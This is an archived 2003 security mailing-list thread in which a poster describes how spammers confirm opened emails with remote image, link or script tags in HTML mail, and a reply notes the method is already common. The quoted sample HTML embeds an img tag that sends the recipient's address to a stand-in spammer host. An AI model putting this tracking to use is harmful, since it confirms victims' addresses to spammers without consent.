|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Re: spam technique name?
From: Bill Burge (bill
burge.com)
Date: Tue Apr 22 2003 - 12:17:30 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
This is already very common...
Sadly, the place that pays my bills uses this sort of thing in all customer mail.
bb
*********** REPLY SEPARATOR ***********
On 4/22/2003 at 12:06 PM Calderon, Juan C (CORP, DDEMESIS) wrote:
>Hello all
>
>Recently I was thinking about a technique that could be used by spammers,
>I don't know a common name or something for such a technique, so if you
>know it please let me know.
>
>PROBLEM
> How can a spammer know if the victim opened the mail?, one is the well
>known "Remove Me" link which, in fact, will confirm user read the message
>(and probably will be bombed with many more, now that he said "hey!, I'm
>here"). However, it requires user interaction.
>
>SOLUTION
> A simple "solution" can be to insert a Image, Link (for CSS for example)
>or Script tag in the HTML mail, all those elements indicate Web browsers
>to send a GET request using the SRC or HREF attribute, without user
>interaction.
>
>Sample Code (Mail sent to ficticious peterfoomail.com)
><HTML>
><BODY>
> Dear Peter<br>
> Buy our brand new product, CHEAP, CHEAP, CHEAP....
> <img
>src='http://www.spamer.com/AutoRecordAddress.php?email=peter%40foomail%2Ecom'><br>
> Click <a href='http://www.spamer.com/ConfirmVictim.php'>Here</a> to be
>removed<br>
> NOTE:the presence of this link indicates this is not spamming even if you
>don't ask for this email
></BODY>
></HTML>
>
>Viewing (or "previewing" in Outlook or similar) this email will
>automatically send a request for a "image" file served by a Server-side
>script, first recording the data without explicit authorization.
>
>I've tested this (using 3 different tags) using Exchange and some others
>public accounts. I have succeed in all cases.
>
>So have you seen something similar? do you think this is a kind of XSS? I
>do.
>
>cheers :)
>________________________________________
>Juan C Calderon
>IT Security
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]